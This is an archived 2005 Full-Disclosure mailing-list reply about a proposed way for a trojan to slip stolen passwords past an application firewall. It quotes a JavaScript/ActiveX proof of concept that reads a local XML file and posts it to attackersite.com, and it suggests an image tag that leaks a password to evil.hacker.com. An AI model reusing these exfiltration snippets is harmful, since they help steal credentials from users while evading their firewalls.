lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <20051221163604.GC23202@melpomene.jschipper.dynalias.net>
Date: Wed Dec 21 16:36:10 2005
From: j.schipper at math.uu.nl (Joachim Schipper)
Subject: new attack technique? using JavaScript+XML+OWS
	Post Data

On Wed, Dec 21, 2005 at 08:58:30PM +0530, Gaurav Kumar wrote:
> While researching COM related security vulnerabilities I thought of
> this possible attack technique, not sure if it has been discussed
> before.
> 
> 
> Problem/challenge statement:
> 
> A Trojan has been to be placed in a system running an application
> firewall like Zone Alarm Pro etc. The Trojan is not allowed to make
> any outbound connections. The challenge is to send data (key logged
> passwords etc) back to the attacker.

> Solution
> 
> The Trojan can be designed to generate an xml file which will contain
> the data to be sent out. The attacker will lure the user to visit a
> website hosted by him. The site can have following HTML code-
> 
> <html>
> <body>
> The author is not responsible for any misuse, this PoC is for
> educational purpose only.
> <object classid="clsid:{BDEADE98-C265-11D0-BCED-00A0C90AB50F}"
> id="exp">
> </object>
> <script LANGUAGE=javascript>
> var xmlDoc
> xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
> xmlDoc.async=false;
> xmlDoc.load("c:\\note.xml");
> xmlObj=xmlDoc.documentElement;
> var a= xmlObj.firstChild.text;
> exp.Post(0,"http://www.attackersite.com/input.asp",a);
> </script>
> </body>
> </html>
> 
> Content of note.xml could be ?
> 
> <password>secret</password>
> 
> 
> The above code (works well on windows XP SP2) essentials calls "OWS
> Post Data" COM control to post the contents of note.xml (generated by
> trojan) to attackersite.com
> 
> Essentially, the technique is breaking the basic functionality of
> application firewalls by using OWS Post Data as bridge for sending out
> the data using Javascript and XML.

> flames/spam/abuse etc can be sent to spam@...urebox.org
> comments can be sent to gaurav@...urebox.org

I'll just assume you read the list.

I'm not an expert, but I don't recall ever seeing this particular
implementation. Then again, there are easier ways to go about this - for
instance, how about embedding a <img
src="http://evil.hacker.com/callback/ThisIsMyVerySecretPassWord" width=1
height=1> tag into an arbitrary HTML file? It works on any graphical
browser without special protection.

Search the archives for some more neat tricks - calling the proper APIs,
IE can be used to send out pretty much arbitrary data. [1]

If you're willing to attack ZA specifically (instead of a generic
application/-based firewall, of which there are many) just use the
Windows API to generate the proper mouse clicks/keypresses.

		Joachim

[1] Some would say that, calling the 'proper' APIs, IE can be used to
send *in* pretty much arbitrary data too. I'd be inclined to agree.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ